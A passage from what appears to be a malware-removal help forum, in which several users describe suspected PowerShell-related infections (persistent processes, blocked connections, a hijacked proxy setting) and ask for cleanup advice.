  16. Iv got this really annoying problem with powershell.exe, sometimes i cant even access any internet domain and it doesnt let me update the antivirus (ESET). The powershell.exe starts up with windows and nothing that i did could prevent it from doing so, iv scanned this pc with Malwarebytes, RougueKiller, ZHPCleaner, ADWcleaner, Spyware and Farbar, but none of those found anything, besides rouguekiller, but the files it deleted came back as soon as the pc restarted. Im trully lost in this one, pls help Here are the logs from the scans iv ran Addition.txt FRST.txt JRT.txt mrt.log Roguekiller log.txt ZHPCleaner.txt
  17. I wrote a Powershell script that uploads and downloads files through FTP. The script is located on a server, and 5 computers have shortcuts that point to the script. Anti-Exploit is running on all computers and managed through the Management console on the server. One of the computers occasionally blocks this file and identifies it as an exploit. ("Exploit Payload process blocked"). Once the computer is restarted or anti-exploit is restarted, we don't have issues for days at a time. The issue ONLY occurs on this specific computer, and only sporadically.
  18. First time asking for help. For awhile(past week or so) now Powershell pops up for a sec in my taskbar, then Malwarebytes give me a popup saying that it blocks off some connection from forallshop.info, usually at 12:09 P.M. and 8:09 P.M. it also does this every day, though it has skipped a days once in awhile. My primary security is Mcafee. I've run Malwarebytes, the Malwarebytes adware cleaner, Anti-rootkit, and Junk Removal tool, I've also ran Zemana, Hitmanpro, and Sophos Virues Removal Tool. Any advice?
  19. Last week i wasn't able to use my internet banking due to the https certificate not being recognized. At the same time, some websites would not load, and Chrome kept saying i wasn't connected to the internet - which i was, as pages loaded normally on my phone. I reset my router to factory setting and reconfigured the network settings to no avail. It was only then that i found that my LAN is set to a proxy server on 127.0.0.1:30828. Once i unchecked that, everything was fine, but that option gets checked again (with a different port) everytime i reboot. As i was snooping around my active processes looking for the issue, i stumbled upon some that i didn't recognize, most notably one called SYS*MY PC NAMETAG*50.EXE, apparently related to powershell. It's located on the Java folder under syswow64, but it didn't exist until recently and i haven't updated Java in a while. It also eats up a shitload of memory... There's a few other processes i couldnt recognize, but i figured i should get a full activity log analysed by someone who might be able to pinpoint if there's any malware around. Could you guys please help me out?
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.